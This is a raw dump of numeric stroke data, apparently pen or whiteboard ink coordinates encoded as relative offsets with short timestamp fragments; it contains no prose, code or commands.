0-16,0 18 15,70-1-15,1-17 16,-19 0-16,-16 0 16,-19 0-16,1 0 15,-18 0-15,-36 0 16,1 0-16,17 0 16,-17-17 15,0 17 47,-1 0-31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10.3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59 8767 0,'17'0'16,"36"0"-16,18 0 16,52 0-16,18 0 15,36 17-15,-36-17 16,18 18-16,-18-18 16,0 0-16,124 0 15,-124 17 1,53 36-16,-71-35 15,53 0-15,19-1 16,-1 1 0,-36 0-16,-34-18 0,-18 0 15,-53 0-15,-36 0 16,1 0 0,-1 0 46,1 0-46,17 0-1,-17 0-15,0 0 16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2:37.1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49 8969 0,'20'0'47,"-1"0"-47,21 0 15,0 0-15,39 0 16,-19 0-16,-1 0 16,1 0-16,19 0 15,-39 0 1,59 0-16,-20 0 0,40 0 16,20 0-1,20 0-15,-20 0 0,-40 0 16,20 0-1,-39 0-15,-1 0 0,-39 0 16,-20 0 0,-1 0-16,1 0 15,0 0 17,-20 20-17,20-20-15,0 0 16,0 0-1,0 0 1,-1 0-16,1 0 16,0 0-1,0 0 1,0 0 0,0 0-16,-1 0 15,1 0 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8:02.2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501 9168 0,'20'0'62,"19"0"-62,1 0 16,20 0-16,-1 0 15,1 0-15,39 0 16,20 0-16,0 0 16,0 0-16,-20 0 15,-19 0-15,-1 0 16,-19 0-16,-21 0 15,21 0 1,-1 0-16,1 0 16,-20 0-16,19 0 0,21 0 15,-1 0 1,0 0-16,-19 0 16,-1 0-16,1 0 15,-1 0-15,1 0 16,-20 0-16,19 0 15,-19 0-15,39 0 16,-19 0-16,-21 0 16,41 0-16,-1 0 15,20 0-15,-59 0 16,20 0-16,-1 0 16,-19 0-16,19 0 15,-19 0-15,39 0 16,-39 0-16,20 0 15,-21 0-15,1 0 16,0 0-16,-1 0 16,21 0-16,-20 0 15,-1 0-15,1 0 16,20 0-16,-21 0 16,21 39-16,-1-19 15,1 0-15,19 0 16,40 19-1,-59-39-15,39 0 16,-20 0-16,1 0 16,19 0-16,-39 0 15,19 0-15,-20 0 16,-19 0-16,20 0 16,-41 0-16,21 0 15,20 0-15,39 0 16,0 0-16,80 0 15,-60 20-15,20-20 16,-60 0-16,-19 0 16,-1 0-16,-39 0 15,20 0-15,-20 0 16,-1 0-16,1 0 16,20 0-1,0 0-15,-1 0 16,1 0-1,-20 0-15,0 0 16,-1 0 0,1 0 46,0 0-15,-20-20-47,20 20 16,0 0-16,-20-19 15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2:50.5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58 9029 0,'20'0'63,"39"0"-63,21 0 16,19 0-16,60 0 15,-20 0 1,19 0-16,1 0 0,0 0 15,0 0-15,-1 0 16,1 0 0,40 0-16,-160 0 0,120 0 15,20 0 1,19 0-16,-39 0 16,0 0-16,-1 0 15,1 0-15,0 0 16,-1 0-16,-19 0 15,20 0-15,-40 0 16,20 0-16,20 0 16,0 0-16,-1 0 15,-19 0-15,-40 19 16,-59 1-16,20-20 16,-21 0-16,-19 0 15,0 0-15,0 0 16,0 0-1,0 0 17,-20 20 311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3:09.5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97 8195 0,'-20'0'63,"20"-20"-47,0 1-16,0-1 31,20 20-31,-20-20 15,20 0-15,0 20 16,20-20-16,-21 0 16,21 0-16,20-19 15,-21 19-15,1 0 16,0 0-16,-1 20 16,21-20-1,-20 1 1,19-1-16,1 20 0,19-40 15,-19 20 1,19-20-16,0 40 16,21-39-16,-1-1 0,-20 20 15,1-19 1,-1 19-16,20 0 16,-20-20-16,1 20 15,-21 1-15,60-1 16,-39-20-16,-21 40 15,41 0-15,-1 0 16,40 0-16,19 0 16,21 0-16,-40 0 15,20 0-15,-60 0 16,-20 0-16,1 0 16,-21 0-16,1 0 15,19 0-15,-19 0 16,59 0-16,-40 0 15,20 0-15,-39 0 16,-40-20-16,39 0 16,-39 20-16,20 0 15,-20 20 1,-1-20 0,1 0-1,0 0-15,-20 20 16,40-20-16,-20 0 15,-20 20 1,19-20-16,1 0 47,0 0-31,-20 20-1,20-20 1,0 20-1,0-20 1,0 0-16,19 19 16,-19-19-1,20 40 1,-1-20-16,-19 20 16,40 39-1,-21-59-15,1 19 0,0-19 16,0 20-16,-1-20 15,1 20-15,-20-40 16,0 19-16,-1-19 16,-19 20-1,0 0-15,20-20 16,-20 20 0,20-20-1,-20 20 1,20-20-16,-20 20 15,20-1 1,-20 1 0,20 0-1,0 0-15,-1 0 16,1 20-16,-20-21 16,20 1-16,-20 0 15,20 0-15,0 0 16,-20 0-1,0-1-15,0 1 16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3:10.3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935 7441 0,'0'20'15,"0"40"1,0-1-16,0 20 16,0-19-16,0 19 15,0 21-15,0-21 16,0 0-16,0-59 16,0 60-16,0-21 15,0 1 1,0-1-16,0-39 15,0 20-15,0-20 16,0-1 0,-20 1-1,20 0 1,0 0-16,-20-20 16,20 40-16,-79-21 15,39 21-15,-39-40 16,0 0-16,-40 0 15,19 0-15,41 0 16,-21 0-16,41 0 16,-1-20-16,20 20 15,0-20 1,20 1 0,0-1-16,-19 20 15,19-20-15,0 0 31,-20 20-15,20-40 0,-20 40-16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3:38.90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0697 9088 0,'40'0'31,"39"0"-15,-59 0-16,79 0 15,20 0-15,0 0 16,60 0-16,-60 0 16,0 0-16,-40-20 15,1 20-15,-1 0 16,-19 0-16,-1 0 15,1 0-15,-21 0 16,1 0 0,-20 0-1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23:41.29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778 10596 0,'20'0'16,"0"0"-1,0 0 1,39 0 0,-19 0-16,39 0 15,1 0-15,-1 0 16,60 0-16,-40 0 16,80 0-16,19 0 15,1 0-15,19 0 16,-159 0-1,140 0-15,19 0 16,20 0-16,-59 0 16,39 0-16,-59 0 15,19 0-15,-39 0 16,40 0-16,19 0 16,1 20-16,39-20 15,60 0-15,-21 0 16,-38 0-16,-21 0 15,-79 0-15,-40 0 16,-59 20-16,19 0 16,1-20-16,-40 0 15,39 0-15,1 0 16,-1 0-16,60 0 16,20 0-16,-20 0 15,40 0-15,39 0 16,-19 0-16,-20 0 15,-1 0-15,-19 0 16,20 0-16,0 0 16,0 0-16,-100 0 15,120 0-15,19 0 16,40 0-16,-19 0 16,19 0-1,-20 0-15,0 20 16,-39-20-16,-20 0 15,-80 0-15,-19 0 16,-41 0-16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44.9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93 4939 0,'0'0'0,"-18"0"16,-17 0-16,0 0 15,-1 0-15,1 0 16,0 0-16,-18 0 16,18 0-16,-1 0 15,-17 0-15,0 0 16,1 0-16,-1 0 16,0 0-16,-18 0 15,1 0-15,17 0 16,-36 0-16,19 0 15,-18 0-15,35 0 16,-18 0 0,18 0-16,18 0 0,17 0 15,1 0-15,-1 0 16,1 0 125,17-18-126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4:59.6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7849 0,'0'0'0,"-18"0"0,0 18 15,1-18 1,-18 0-16,-1 0 15,-17 0-15,18 18 16,-18-18-16,18 17 16,17-17-16,1 0 15,-1 0 1,0 18-16,1-18 16,-19 0-16,1 0 15,0 0-15,0 0 16,-1 0-16,1 0 15,-18 0-15,18 0 16,17-18-16,-17 18 16,17 0-16,1 0 15,-1 0 17,0 0-17,1 0 1,-19 0-1,19 0-15,-18 0 16,17 0-16,-17 0 16,17 0-1,0 0 95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5:06.6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10848 0,'0'-18'109,"-18"18"-93,-35 0-1,-52 0-15,-19-17 16,-17 17-16,0 0 15,0 0-15,0 0 16,35-18-16,0 18 16,18 0-16,17 0 15,-17-18-15,35 18 16,36-17-16,-1 17 16,0 0-16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5:15.7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3 12400 0,'-17'0'63,"-1"18"-32,1-18-31,-19 0 16,-70 0-16,18 0 15,-35 0-15,17 0 16,-35 0-16,0 0 15,17 0-15,18 0 16,1 0-16,-1-18 16,-35 18-1,88 0 1,0 0-16,18 0 0,17 0 16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31.6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22 4604 0,'-17'0'31,"-1"0"-15,-17 0-16,0 0 15,-1 0-15,1 17 16,-18-17-16,0 0 16,0 0-16,-17 18 15,17-18-15,0 18 16,18-18-16,-1 0 16,1 0-16,18 0 15,-1 0 95,0 0-95,18 17 1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8:08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85 11866 0,'20'0'31,"0"0"-31,-20 20 16,39-20-16,1 20 15,20-20-15,19 20 16,40-20-16,20 20 16,20 0-16,19-20 15,-39 0-15,20 0 16,-20 0-16,-40 0 15,20 0 1,-79 0-16,59 0 16,60 0-16,0 0 15,19 0-15,1 0 16,59 19-16,0-19 16,0 0-16,-20 0 15,21 20-15,-61-20 16,21 0-16,-21 0 15,-19 0-15,0 0 16,-1 0-16,-19 0 16,20 0-16,-99 0 15,98 20-15,21-20 16,-20 0-16,-1 0 16,-19 0-16,-20 0 15,-19 0-15,-21 0 16,40 0-16,-20 0 15,40 0-15,-20 0 16,20 0-16,-20 0 16,-39 0-16,-21 0 15,1 0-15,-21 0 16,-19 0 0,0 0 15,20 0-31,-1 0 15,1 0-15,39 0 16,21 0-16,19 0 16,-20 0-16,-59 0 15,59 0-15,20 0 16,-40 0-16,-19 0 16,-1 0-16,-19 0 15,39 0-15,-39 0 16,20 0-16,-1 0 15,21 0-15,-21 0 16,20 0-16,1 0 16,-1 0-16,20 0 15,-39 0-15,19 0 16,-59 0-16,60 0 16,-1 0-16,60 0 15,-60 0-15,20 0 16,20 0-16,-19 0 15,19 0-15,-40 0 16,20 0 0,20 0-16,-39 0 15,-1 0-15,-19 0 16,-21 0-16,1 0 16,39 0-16,-19 0 15,-40 0-15,79 0 16,20 0-16,-20 0 15,20 0-15,-59 0 16,-1 0-16,-39 0 16,20 20-16,-20-20 15,20 0-15,-1 0 16,21 0-16,-21 0 16,41 0-16,-21 0 15,21 0-15,-1 0 16,0 0-16,-39 0 15,39 0-15,1 0 16,-1 0-16,-19 0 16,-1 0-16,-39 0 15,0 0 17,0 0-1,0 0 0,0 0-15,19 0-16,1 0 15,19 0-15,41 0 16,-1 0-16,99 0 16,-39 0-16,0 0 15,-20 0-15,-20 0 16,0 0-16,-60 0 15,1 0-15,-20 0 16,-1 0-16,21 0 16,-20 0-16,59 0 15,-60 0-15,61 0 16,39 0-16,-40 0 16,20 0-16,-60 0 15,1 0-15,-40 0 16,0 0-16,-1 0 15,1 0 1,0 0 62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33.8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21 5062 0,'18'0'47,"0"0"-31,-1 0-1,19 0-15,-1 0 16,0 0-16,18 0 16,0 0-16,-18 0 15,18 0-15,-18 0 16,18 0-16,-17 0 15,-1 0-15,0 0 16,36 0-16,-18 0 16,17 0-16,36 0 15,-18 0-15,36 0 16,-18 0-16,17 0 16,-17 0-16,-36 0 15,-17 0-15,-17 0 16,-1 0-16,-17 0 15,-1 0 48,18 0-47,-17 0-1,35 0-15,-18 0 16,-17 0-16,0 0 15,-36 0 204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38.3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53 4780 0,'18'0'0,"0"0"31,17 0-16,18 0 1,17 0-16,36 0 16,-18 0-16,36 0 15,-18 0-15,0 0 16,17 0-16,-17 0 16,17 0-16,36 0 15,35 0-15,18 0 16,17 0-16,53 0 15,18 0-15,35 0 16,106 0-16,36 0 16,-54 0-16,71 0 15,-71 0-15,18 0 16,-18 0-16,-123 0 16,-18 0-16,-35 0 15,-17 18 1,-72-18-16,1 35 0,-71-17 15,18-1-15,-53 19 16,-18-36-16,1 0 16,-19 17 77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44.3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6385 0,'-53'0'62,"-88"0"-62,-53 0 16,0 0 0,35 0-16,1 0 15,34 0-15,53 0 16,36 0-16,18 0 47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48.0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826 6526 0,'0'0'0,"35"0"16,1 18-16,-19-18 15,36 18-15,-18-18 16,1 0-16,52 17 15,-17 1-15,-1-18 16,54 0-16,-19 0 16,19 0-16,-1 18 15,18-18-15,-17 0 16,-1 0 0,-17 0-16,18 0 0,-1 0 15,-17 0-15,17 0 16,1 0-1,17 0-15,18 0 16,17 0-16,-17 0 16,17 0-16,1 0 15,-1 0-15,18 0 16,-35 0-16,-18 0 16,35 0-16,-70 0 15,-18 0-15,1 0 16,-19 0-16,1 0 15,-18 0-15,-18 0 16,0 0-16,0 17 16,-17-17-1,-36 0 95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6:49.0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81 7885 0,'17'0'15,"18"0"1,1 0-16,34 0 16,19 0-1,-19 0-15,36 0 0,-18 0 16,-17 0-16,-1 0 15,-17 0 1,-18 0-16,-17 0 63,-18-18-32,0 0 16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5:56.2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04 4568 0,'0'18'78,"18"-18"-78,-18 18 16,17-18-16,-17 17 16,18-17-16,0 0 15,17 0 1,-17 0-16,-1 0 31,1 0 16,-1 0 16,1 0 15,0 0-47,-1 0-31,19 0 16,17 0-16,-36 0 15,1 0-15,-1 0 31,-17 18 157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6:02.2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746 6421 0,'35'0'94,"1"17"-78,17 1-16,-1-1 15,-16-17-15,17 0 16,-18 0-16,-17 0 15,-1 0-15,-17 18 125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7:29.8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22 476 0,'0'18'47,"-18"35"-47,1-18 15,-72 53-15,-16 0 16,-72 18-16,-17 18 16,-70 35-16,-19-1 15,-175 107-15,70-18 16,-177 53-16,54-18 16,105-88-16,36 18 15,52-36-15,107-17 16,69-53-16,107-1 15,35-52-15,0 0 16,71 0-16,52-18 16,36-17-16,53 0 15,52-18-15,-17 0 16,141 0-16,106 0 16,-71 0-16,107 0 15,16 17-15,-158-17 16,-141 0-16,-35 0 15,-124 0-15,-53 0 16,-35-17 15,-35-19-31,-53-34 16,0-36-16,0-35 16,-36 0-1,-17-71-15,0-17 16,-18-53-16,-17-36 15,52-35-15,-17 53 16,-35-105-16,88 70 16,-1 88-16,54 0 15,0 106-15,17 123 16,1 18 46,-1 0-46,-17 88-16,-18 71 16,0 53-16,18 52 15,-18 54-15,35 34 16,18 178-16,0-54 16,0-88-16,0 53 15,0-18-15,0-123 16,53 35-16,0-105 15,0-36-15,0-53 16,-18 17-16,0-69 16,-17-1-1,0-53-15,-1-35 16,-17 18 15,0-1-15,0 1-1,18-18 32,-1-53-31,19-53 0,17-17-16,0-54 15,35-17-15,18-53 16,-18 36-16,53-54 15,-53 54-15,53-142 16,106-35-16,-53-53 16,18-71-16,-53 159 15,-18 1-15,-36 140 16,-69 53-16,-19 71 16,-17 35-16,0 35 15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41:10.9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75 582 0,'-18'35'0,"-35"54"16,1-19-16,16 18 15,-17 0-15,-17-17 16,-18 53 0,17-89-16,-17 18 0,-53 0 15,17-18-15,-17 18 16,18-18-16,17 0 16,-18 36-16,36 0 15,53-19-15,-53 37 16,0-19-1,35 1-15,35-36 16,-17 18-16,35-18 16,0 0-16,0 1 15,0-19-15,17 36 16,36 0-16,106 18 16,17 17-16,36-35 15,17 0-15,54 35 16,-72-70-16,1-1 15,-36 1-15,-70-18 16,-53 0-16,-18 0 16,-17 0-16,-18-18 31,0-35-31,-18-35 0,-17 0 16,-18-71-16,0 18 15,-35-53-15,0 18 16,-18-71-16,-17-35 15,-1 87-15,18 19 16,0-18 0,1 53-16,16 35 15,1-35-15,35 70 16,18 1-16,-18 17 16,18 53-16,35 88 78,35 71-63,0 35-15,1 35 16,-19 1-16,36 69 16,-18 19-16,18-71 15,-17-18-15,-36 53 16,35-35-16,-35-35 15,18-36-15,-18 1 16,35-36-16,-35-88 16,17-36-16,-17 1 15,0-36 32,0-52-47,18-1 16,-18 18-16,18-52 15,-1-1-15,19-18 16,52-17 0,-18-35-16,19-18 15,69-71-15,-69 71 16,69-35-16,-17-53 16,0 17-16,-52 71 15,-19 53-15,-17 53 16,-35 52-16,-18 1 15,0 18 64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41:12.9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63 758 0,'0'-17'31,"-35"34"-15,-1 19-16,-34 52 15,17-35-15,-53 35 16,-53 0-16,-17 18 15,-18-18-15,0 18 16,35-35-16,0-1 16,18 18-16,35 18 15,1-18-15,34 1 16,18-19-16,53 18 16,0 1-1,0-19-15,0 18 0,18 1 16,70 16-16,0-16 15,53-1 1,0-53-16,18 0 0,70 1 16,1-36-1,-19 0-15,-34 0 16,-18-36-16,-71-34 16,18-36-16,-54 0 15,1-53-15,-35 18 16,-18-35-16,0-18 15,0 0-15,-18 35 16,1-53-16,-71-17 16,17 17-16,-17 36 15,17 35-15,1-18 16,-1 53-16,18 53 16,36 18-16,-1 17 15,0 18 1,-35 0-1,0 106 1,18 35-16,18 89 16,-1 70-16,18 35 15,0 53-15,0 53 16,53-159-16,0-53 16,35 18-16,-53-106 15,18-17-15,-18-54 16,-17-34-1,0-54 48,-18-35-47,0-35-16,0-36 15,0-70-15,0-88 16,0-141-16,0-106 15,0-53-15,0 194 16,0 52-16,0 160 16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33.5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83 13930 0,'40'0'109,"-1"0"-93,21 0-16,39 0 16,40 0-16,20 0 15,20 0-15,19 0 16,-139 0-16,140 0 15,39 0-15,0 0 16,0 0-16,-39 0 16,-1 0-16,-39 0 15,-60 0-15,-79 0 16,0 0 187,0 0-187,-1 0-1,1 0 1,20 0 0,20 0-1,-21 0-15,21-20 16,-40 0-16,-1 20 15,1 0-15,0 0 32,0 0-17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36:46.5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48 7441 0,'20'0'31,"40"0"-15,-41 0-16,100 0 15,20 0-15,20 0 16,59 0-16,-19 0 16,19 0-16,20 0 15,0 0-15,20 0 16,40 0-16,-40 0 16,20 0-16,-40 0 15,59 0-15,-39 0 16,40 0-16,-20 0 15,20 0-15,-199 0 16,198 0-16,-39 0 16,0 0-16,-39 0 15,39 0-15,-20 0 16,-40 0-16,40 0 16,0 0-16,1 0 15,-21 0 1,-40 0-16,-19 0 0,0 0 15,0 0 1,39 0-16,-79 0 16,0 0-16,-79 0 15,99 0-15,-40 0 16,20 0-16,-20 0 16,20 0-16,-19 0 15,19 0-15,-20 0 16,-20 0-16,40 0 15,-39 0-15,19 0 16,20 0-16,-40 0 16,60 0-16,-20 0 15,20 0-15,-39 0 16,-41 0-16,20 0 16,1 0-16,-21 0 15,1 0-15,-1 0 16,1 0-16,-20 0 15,-1 0-15,21 0 16,-40-20-16,39 20 16,1 0-16,-1 0 15,-19 0-15,0 0 16,-21 0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36:48.0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093 4425 0,'0'0'0,"139"0"0,20 0 16,-40 0-16,79 0 16,1 0-16,19 0 15,-39 0-15,-120 0 16,120 0-16,-20 0 15,-40 0-15,20 0 16,-40 0-16,-40 0 16,1 0-16,-1 0 15,1 0-15,-1 0 16,-19 0-16,0 0 16,-20 0-16,0 0 15,-1 0 1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36:50.5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03 0 0,'-19'0'31,"-1"0"-15,-20 79-16,-19 100 15,-80 19-15,-60 100 16,-19 19-16,-80 80 15,-19-40-15,-100 60 16,100-119-16,257-120 16,60-59-16,0-79 15,0 20-15,0-41 16,0 1-16,0 0 16,0 0-16,40 0 15,39 39 1,40 1-16,80-20 15,39 19-15,20-59 16,39 0-16,100 0 16,-258 0-1,198-20-15,-59-79 0,-59 20 16,-81-1-16,-38 21 16,-41-40-1,-19-21-15,-40-18 16,0-21-16,0-40 15,0-19-15,-20-40 16,-59-59-16,-80-120 16,20 40-16,79 278 15,-118-238-15,-40 20 16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36:51.3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9 397 0,'0'0'0,"0"535"0,0 100 16,0-39-16,0-41 15,0-237-15,39-40 16,21-100-16,19 1 15,-39-20-15,20-21 16,-1 1-16,40 40 16,40 0-1,-59-60-15,-61-60 16,81 60-16,-41 0 16,1-79-16,-40 20 15,19-1-15,1 1 16,19-1-16,-19 40 15,20-19-15,-1-1 16,-19-39-16,-20-1 16,19 21-16,-19-20 15,0-20-15,0-1 16,0-19-16,0 0 16,0 0-16,-1 0 15,1 0-15,0 0 16,20-99-16,-1-40 15,41-39-15,-1-1 16,1-99-16,-21 40 16,-19-99-16,-20-1 15,-20 41-15,0-60 16,0 39-16,0 40 16,0 80-16,0-20 15,0 138-15,-20-59 16,0 0-1,-40 0-15,41-19 0,-41-21 16,-39 1 0,39-41-16,21 41 15,-100 19-15,39 0 16,-19-19-16,40-21 16,19 21-16,1 19 15,-1 20-15,21 40 16,19 19-16,20 60 15,0 1-15,-20-1 16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19.7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3 4481,'18'0,"0"0,18 0,-18 0,19 0,35 0,37 0,-18 0,36 0,36 0,-36 0,36 0,-54 0,-36 0,-37 0,0 0,-36-18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21.8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05 4336,'18'0,"0"0,19 0,17 0,-18 0,55 0,0 0,18 0,0 0,-1 0,19 18,19-18,-38 18,19-18,-18 0,0 0,-18 0,18 0,-19 0,-17 0,18 0,-19 0,-17 19,17-19,37 18,-36-18,17 18,56-18,-19 0,18 0,-18 0,0 18,18 0,-18-18,-36 0,54 0,-18 18,-55-18,55 18,-54-18,-1 0,-17 19,17-19,-35 18,-19-18,0 0,0 0,0 0,37 18,-19-18,-18 18,0-18,0 0,37 0,-19 0,-18 0,19 0,-19 0,36 0,-36 0,19 0,-19 0,0 0,0 0,18 0,1 0,17 0,0 0,1 0,-1 0,1 0,-1 0,1 0,-19 0,18 0,1 0,-1 0,19 0,-19 0,37 0,0 0,17 0,1 0,-18 0,54 0,-54 0,54 0,-54 0,36 0,-18 0,-1 0,19 0,-54 0,0 0,-1 0,-17 0,-37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24.1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41 5606,'0'0,"36"0,-18 0,19 0,-1 0,0 0,19 0,-1 0,-18 0,37 0,-19 0,19 0,18 0,36 0,0 0,-18 0,72 0,-36 0,18 0,37 36,18-17,-55-19,55 0,-1 0,19 0,-18 18,-18 18,35-36,-89 0,53 18,-54-18,0 0,1 0,-1 0,0 0,-18 0,36 0,-36 0,18 0,-18 0,18 0,1 0,-1 0,18 0,-18 0,0 0,0 0,37 0,-1 0,1 0,-37 0,91 0,-19 18,-17-18,-19 0,37 0,0 0,18 0,-55 0,37 18,-55-18,0 0,-17 0,-19 19,-55-38,37 19,0 0,-18 0,-19 0,37 0,18 0,-36 0,36 0,-37 0,19 0,0 0,18 0,18 0,-18 19,37 17,-37-36,18 0,0 0,0 0,36 0,-72 0,73 0,-73 0,36 0,-18 0,18 0,-18 0,18 0,-18 0,18 0,-36 0,18 0,-36 18,-19-18,19 18,18 0,-18-18,-19 0,19 0,-37 0,1 0,-19 37,-18-37,0 0,0 0,1 0,-1 0,0 0,0 0,0 0,0 0,0 0,1-19,17 19,-18-18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0:56.6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56 6205,'18'0,"37"0,-1 0,73 0,18 0,37 0,54 0,-55 0,37 0,36 0,0 0,-18 0,36 0,-36 0,-1 0,56 0,-19 0,-36 0,36 18,-18-18,91 0,-128 18,19-18,-18 18,18 0,-37-18,-35 19,-37-19,-19 18,-35-18,18 18,-55-18,18 0,-35 0,-1 0,0 18,0-18,0 0,0 0,19 0,17 0,0 18,-35-18,17 0,-18 18,18-18,-18 0,1 0,17 0,0 0,0 0,37 0,-19 0,19 0,-19 0,1 0,-1 0,73 0,-90 0,-19 0,0 0,-18-18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0:57.8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274 7656,'0'0,"0"-18,18 18,-18-18,19 18,-1 0,0 0,0 0,18 0,1 18,-19-18,0 0,18 18,-18 0,0-18,1 0,-1 0,0 0,0 0,0 0,0 0,0 0,1 0,17 0,0 0,-18 19,19-1,-19-18,0 0,18 0,37 0,-37 0,37 0,-55 0,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0:59.6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55 10958,'18'0,"1"0,17 0,0 0,37 0,17 0,37 37,-18-37,0 0,54 18,1-18,-1 0,-18 0,37 18,-74-18,1 0,36 36,-18-18,19-18,-19 18,0 1,36-1,-18 0,-18-18,18 0,-18 0,18 0,55 0,-19 0,-17-18,-56 18,19 0,0 0,-36 0,36 0,-36 0,-19 0,19 0,-18 0,-19 0,1 0,35 0,1 0,-18 0,-19 0,0 0,19 0,0 0,35 0,-53 0,-1 0,-17 0,17 0,-18 0,-18 0,1 0,-1 0,0 0,0 0,18 0,-18 0,1 0,-1 0,18 0,-18 0,37 0,-37 0,36-18,55 18,-55-19,-35 1,17 18,73 0,-19 0,-17 0,-55 0,3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36.6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52 14069 0,'0'0'0,"0"20"31,40-20-31,-1 20 16,21-20-16,-1 0 15,21 0-15,-1 0 16,0 0-16,1 0 16,-1 0-16,-19 0 15,19 0 1,-19 0-16,-1 0 0,21 0 16,39 0-1,0 0-15,59 0 16,1 0-16,-120 0 15,100 0-15,20 0 16,-21 0-16,-38 0 16,-41 0-16,-39 0 15,-1 0-15,-19 0 16,0 0 171,0 0-171,0 0-16,39 0 16,40 0-1,20 0-15,20 0 16,-99 0-16,79 0 16,0 0-16,-39 0 15,19 0-15,0 0 16,-39 0-16,-21 0 15,-19 0-15,0 0 16,0 0 0,0 0-16,-1 0 15,21 0-15,0 0 16,19 0-16,21 0 16,-21 0-16,1 0 15,19 0-15,1 0 16,19 0-16,-20 0 15,1 0-15,-61 0 16,61 0-16,-21 0 16,-19 0-16,0 0 15,-21 0-15,1 0 16,0 0-16,20 0 16,0 0-16,-1 0 15,1 0-15,19 0 16,1 0-1,-20 0-15,-1 0 16,1 0-16,20 0 16,-41 0-1,1 0 1,20 0 0,19 0-1,21 0-15,-1 0 16,40 0-16,20 0 15,-40 0-15,1 0 16,19-20-16,0 20 16,-40-20-16,0 20 15,1 0-15,-1 0 16,-19 0-16,-21 0 16,-19 0-16,20 0 15,20 0-15,-1 0 16,-19 0-16,-1 0 15,41 0-15,-40 0 16,19 0 0,20 0-16,-19 0 0,19 0 15,1 0 1,19 0-16,0 0 16,-20 0-16,-19 0 15,19 0-15,-19 0 16,-40 0-16,39 0 15,-19 0-15,20 0 16,-41 0-16,1 0 16,0 0-1,0 0 1,0 0-16,0 0 16,19 0-16,1 0 15,20 0-15,-21 0 16,1 0-16,-20 0 15,0 0 1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0.8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244 10940,'0'0,"37"0,-1 0,-18 0,18 0,1 18,-1-18,-18 0,18 0,-17 18,-1-18,18 0,-18 0,0 0,0 0,19 0,-19 0,36 19,1-19,35 18,-17 18,0-36,-37 0,-18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1.8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21 11122,'0'0,"18"0,0 0,0-19,18 19,19 0,17 0,19 0,36 0,0 0,73 0,-1 0,19 0,0-18,36 18,0 0,36 0,18 0,128 0,126 18,-17-18,35 0,-72 0,-18 0,-36 19,-146-19,0 36,-54-18,-18 18,-72-36,35 18,-36-18,37 19,-37-19,-36 18,-54 0,-37-18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2.7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891 12428,'0'0,"18"0,0 0,1 0,17 0,18 0,19 0,-1 0,92 0,-37 36,18-18,-18-18,18 0,-54 0,-37 18,1-18,-1 0,-36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4.8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38 15875,'18'0,"18"0,19 0,-19 0,37 0,-1 18,37-18,18 0,-18 0,36 0,0 0,0 0,37 18,-55-18,-18 0,18 0,-55 0,1 0,-37 0,55 18,-19-18,1 0,0 0,-1 0,55 0,-18 0,36 0,18 0,1 0,-74 0,37 0,19 0,-19 0,0 19,-19-19,19 0,0 0,-36 0,18 0,-36 0,-1 0,-17 0,-1 0,-18 0,19 18,35-18,1 0,0 0,-19 0,55 0,19 0,-19 0,0 0,18 0,-55 0,56 0,-19 0,0 0,-37 0,1 0,-18 0,17 0,-53 0,-1 0,0 0,-18 0,0 0,19 0,-19 0,0 0,0 0,0 0,0 0,1 0,17 0,18 0,-17 0,35 0,1 18,-1-18,1 0,-37 0,19 0,-37 0,0 18,0-18,-36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7.2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514 15766,'19'0,"17"0,0 0,0-18,19 18,17 0,19 0,0 0,0 0,-1 0,1-18,-18 18,-1 0,1 0,-1 0,-17 0,-1 0,1 0,-1 0,19 0,-19 0,37 0,-19 0,1 0,-1 0,1 0,-19 0,19 0,-19 0,19 0,0 0,35 0,1 0,0 0,-18 0,18 0,-37 0,55 0,18 0,1 0,-56 0,37 0,0 0,18 0,-36 0,18 0,0 0,18 0,-18 0,19 0,-1 18,-18-18,54 0,19 0,72 0,-36 0,18 0,-37 0,1 0,-18 0,-37 0,0 0,-18 0,-18 0,-18 0,-18 0,-55 0,1 0,-1 0,-36 18,18-18,0 0,0 0,0 0,19 0,35 0,1 0,18 0,-1 0,1 0,0 0,-19-18,19 18,36 0,-73 0,37 0,-18 0,17 0,-35 0,17 18,-35-18,-1 18,-18-18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1:08.2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256 17417,'0'0,"36"0,1 0,17 0,-18 0,1 0,-1 0,0 0,19 0,-19 0,37 0,17 0,-17 0,-19 0,19 18,-19-18,-36 0,1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23.5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90 7655 0,'0'0'0,"53"0"16,0 0-16,18 0 16,-18 0-16,17 18 15,1-18-15,-18 0 16,17 0-1,18 0-15,-52 0 0,34 0 16,-35 0-16,36 0 16,-18 0-1,18 0-15,17-18 0,18 18 16,17-17 0,36-1-16,17-17 15,18 17-15,-17 18 0,17 0 16,-36 0-16,-17 0 15,1 0 1,-37 0-16,-16 0 16,52 0-1,-53-18 1,35 18 0,71 0-1,89 0 1,105 0-1,17 0 1,1 0 0,-36 0-1,-228 0-15,-19 0 16,-17 0 0,-53 0-1,-36 0 1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31.5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979 7726 0,'-17'0'62,"-18"0"-46,17 0-16,-35 0 15,18 0 1,-36 0-16,36 0 16,-36 0-16,-17 0 15,18 0-15,-1 0 16,0 0-16,1 0 15,-1 0-15,1 17 16,17-17-16,18 0 16,-1 18-16,-17-18 15,18 18-15,17-18 16,-34 0-16,-1 0 16,0 0-16,17 0 15,-16 0-15,16 0 16,1 0-16,-18 0 15,18 0-15,-1 0 16,-16 0-16,16 0 16,-17 0-16,18 0 15,0 0-15,0 0 16,-1 0-16,-17 0 16,0 0-16,1 0 15,-37 0 1,19 0 15,52 0-31,1 0 16,-1 0-16,0 0 15,1 0 1,-36 0-16,35 0 16,-35 0-1,18 0 1,0 0-1,-1 0 1,1 0 15,-18 0-15,18 0 15,-4093 17-15,8185-17-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32.9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971 7620 0,'-17'0'31,"-36"0"-15,17 0-16,-17 0 15,-52 0-15,-195 0 32,88 0-32,-35 0 0,18 0 15,0 0-15,-1 0 16,19 0 0,-1 0-16,18 0 15,18 0-15,-1 0 16,36 0-16,35 0 15,-17 0-15,-18 0 16,52 18-16,1-18 16,0 17-16,35 1 15,18 0-15,0-1 16,17-17-16,-17 0 16,-36 0 77,18 0-77,-35 0-16,0 0 16,-18 0-16,0 0 15,-17 0 1,-54 0-1,19 0 1,140 0 0,-17 0-1,-36 0 1,36 0 0,-36 0-1,18 0 1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38.5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40 12718 0,'0'-18'0,"70"0"31,-17 1-15,18 17-16,70 0 16,0 0-16,35 0 15,36 0-15,0 0 16,599 123-1,-300-88 17,1-17-32,-265-18 15,-35 0-15,-71 0 16,-53 0-16,-53 0 16,-17 0-16,-18 18 62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41.2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41 15359 0,'99'0'47,"60"0"-47,99 0 16,60 0-16,78 0 15,120 0 1,-198 0-1,-60 0-15,-40 0 16,-39 0-16,-60 0 16,-20 0-16,-20 0 15,40 0-15,-19 0 16,39 0-16,39 0 16,21 0-16,-21 0 15,-39 0-15,-20 